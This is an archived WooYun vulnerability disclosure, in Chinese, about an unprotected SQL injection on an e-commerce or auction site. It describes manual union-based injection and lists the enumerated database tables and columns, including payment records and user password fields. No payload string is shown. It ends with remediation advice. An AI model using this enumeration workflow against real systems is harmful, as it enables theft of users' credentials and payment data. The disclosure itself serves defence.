乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
如题,未对SQL注入做任何防护,也有一部分可能已被黑阔脱裤
看一下,挺大的站呀
可是某个存在注入的页面和payload貌似被百度抓取下来了,直接可以访问证明:
因此可Union查询回显数据
sqlmap抽掉了,所以手注搞起数据库:
koi_db的表名:
即:
koi_db:[+] activation[+] address_name[+] address_province[+] adv[+] alipay[+] anwser[+] banner[+] banner_old[+] banner_tmp[+] banner_tmp_old[+] bid[+] bid_action[+] bid_image[+] bid_temp[+] bid_title[+] bid_title_old[+] calendar[+] category[+] diary[+] edm_campaign[+] game[+] game_content[+] game_score[+] game_score_content[+] gift[+] gift_action[+] internal_photo[+] internal_photo_content[+] knowledge[+] location[+] mem_temp[+] member[+] news[+] paypal_bid[+] paypal_cart_info[+] paypal_payment_info[+] point_history[+] product[+] product_image[+] question[+] salesorder[+] salesorder_items[+] sc_main[+] sc_users[+] sms_verify[+] staff[+] table_forum[+] table_log[+] user_login[+] votevideo[+] votevideo_title[+] votevideo_type[+] votevideoact[+] votevideoact_bak_20131129[+] votevideoact_bak_20141229
类似可以得到其他数据库的表名:
koishop:[+] wp_commentmeta[+] wp_comments[+] wp_formbuilder_fields[+] wp_formbuilder_forms[+] wp_formbuilder_pages[+] wp_formbuilder_responses[+] wp_formbuilder_results[+] wp_formbuilder_tags[+] wp_icl_content_status[+] wp_icl_core_status[+] wp_icl_currencies[+] wp_icl_flags[+] wp_icl_languages[+] wp_icl_languages_translations[+] wp_icl_locale_map[+] wp_icl_message_status[+] wp_icl_node[+] wp_icl_reminders[+] wp_icl_string_positions[+] wp_icl_string_status[+] wp_icl_string_translations[+] wp_icl_strings[+] wp_icl_translate[+] wp_icl_translate_job[+] wp_icl_translation_status[+] wp_icl_translations[+] wp_links[+] wp_options[+] wp_postmeta[+] wp_posts[+] wp_pronamic_ideal_configurations[+] wp_pronamic_ideal_payments[+] wp_term_relationships[+] wp_term_taxonomy[+] wp_terms[+] wp_usermeta[+] wp_users[+] wp_vs_current_online_users[+] wp_vs_overall_counter[+] wp_woocommerce_attribute_taxonomies[+] wp_woocommerce_downloadable_product_permissions[+] wp_woocommerce_shipping_table_rates[+] wp_woocommerce_shipping_zone_locations[+] wp_woocommerce_shipping_zone_shipping_methods[+] wp_woocommerce_shipping_zones[+] wp_woocommerce_termmetapennydb:[+] accounts[+] addresses[+] affiliate_codes[+] affiliates[+] answers[+] auction_emails[+] auctions[+] autobids[+] bidbutlers[+] bids[+] categories[+] countries[+] coupon_types[+] coupons[+] credits[+] currencies[+] departments[+] genders[+] image_defaults[+] images[+] integrals[+] languages[+] limits[+] managers[+] members[+] messages[+] news[+] newsletters[+] orders[+] package_points[+] packages[+] pages[+] points[+] products[+] questions[+] referrals[+] reminders[+] rewards[+] setting_increments[+] settings[+] smartbids[+] sources[+] statuses[+] translations[+] users[+] watchlists
推断可能是三个站点的数据都在这里了,下面再看一下列信息:
koi_db:[-] alipay[+] trade_no[+] paydate[+] out_trade_no[+] price[+] subject[+] body[+] buyer_email[+] receive_name[+] receive_address[+] receive_zip[+] receive_phone[+] receive_mobile[+] trade_status[+] trade_flag[-] paypal_payment_info[+] firstname[+] lastname[+] buyer_email[+] street[+] city[+] state[+] zipcode[+] memo[+] itemname[+] itemnumber[+] os0[+] on0[+] os1[+] on1[+] quantity[+] paymentdate[+] paymenttype[+] txnid[+] mc_gross[+] mc_fee[+] paymentstatus[+] pendingreason[+] txntype[+] tax[+] mc_currency[+] mc_shipping[+] reasoncode[+] custom[+] country[+] datecreationkoishop:[-] wp_users[+] ID[+] user_login[+] user_pass[+] user_nicename[+] user_email[+] user_url[+] user_registered[+] user_activation_key[+] user_status[+] display_namepennydb:[-] users[+] id[+] username[+] password[+] first_name[+] last_name[+] mobile[+] date_of_birth[+] gender_id[+] email[+] active[+] key[+] newsletter[+] admin[+] autobidder[+] source_id[+] source_extra[+] tax_number[+] phone_number[+] bid_balance[+] ip[+] created[+] modified[+] sms_verified[+] mem_active[+] total_point[+] mem_block[+] mem_del[+] total_cash_coupon[+] mem_address[+] USER[+] CURRENT_CONNECTIONS[+] TOTAL_CONNECTIONS
以上可以看出有alipay,paypal,用户账号密码邮箱和手机号等信息,下面给出截图验证一下:
设置过滤策略,提醒管理员及用户及时更换密码(因为百度就直接出来带union的页面了)
危害等级:高
漏洞Rank:13
确认时间:2015-12-18 11:05
Referred to related parties.
暂无